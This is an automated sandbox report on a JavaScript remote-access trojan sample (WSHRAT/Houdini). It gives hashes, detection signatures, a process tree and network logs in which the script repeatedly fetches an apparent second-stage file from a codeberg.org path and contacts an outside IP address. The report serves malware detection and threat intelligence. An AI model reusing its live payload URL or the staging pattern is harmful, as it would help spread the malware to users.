Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CNWSFY59Z6S1D.JS

Overview

General Information

Sample name:CNWSFY59Z6S1D.JS
Analysis ID:1423162
MD5:8db29e3dbaa512a1585c582d32fcb311
SHA1:f4eed5b85a18556d8f37ad2467872deafcc4993b
SHA256:fbb264da43e2d947bb2cce148d7e4758277aefb6e60345715dcc11e43166918d
Infos:

Detection

WSHRAT
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected WSHRAT
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found WSH timer for Javascript or VBS script (likely evasive script)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 1280 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CNWSFY59Z6S1D.JS" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Houdini, WSHRATHoudini is a VBS-based RAT dating back to 2013. Past in the days, it used to be wrapped in an .exe but started being spamvertized or downloaded by other malware directly as .vbs in 2018. In 2019, WSHRAT appeared, a Javascript-based version of Houdini, recoded by the name of Kognito.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.houdini

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.1210816033.000001A3BFF9E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WSHRATYara detected WSHRATJoe Security
    00000001.00000002.3698182395.000001A3C35B0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WSHRATYara detected WSHRATJoe Security
      Process Memory Space: wscript.exe PID: 1280JoeSecurity_WSHRATYara detected WSHRATJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Script Initiated Connection to Non-Local Network
        Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 217.197.91.145, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 1280, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CNWSFY59Z6S1D.JS", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CNWSFY59Z6S1D.JS", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CNWSFY59Z6S1D.JS", ProcessId: 1280, ProcessName: wscript.exe
        Sigma detected: Script Initiated Connection
        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 217.197.91.145, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 1280, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CNWSFY59Z6S1D.JS", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CNWSFY59Z6S1D.JS", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CNWSFY59Z6S1D.JS", ProcessId: 1280, ProcessName: wscript.exe

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results
        Source: unknownHTTPS traffic detected: 217.197.91.145:443 -> 192.168.2.7:49737 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 217.197.91.145:443 -> 192.168.2.7:49699 version: TLS 1.2
        Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: unknownHTTPS traffic detected: 217.197.91.145:443 -> 192.168.2.7:49737 version: TLS 1.0
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
